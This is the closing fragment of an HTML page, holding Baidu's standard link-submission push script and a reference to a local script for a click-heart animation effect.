<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>
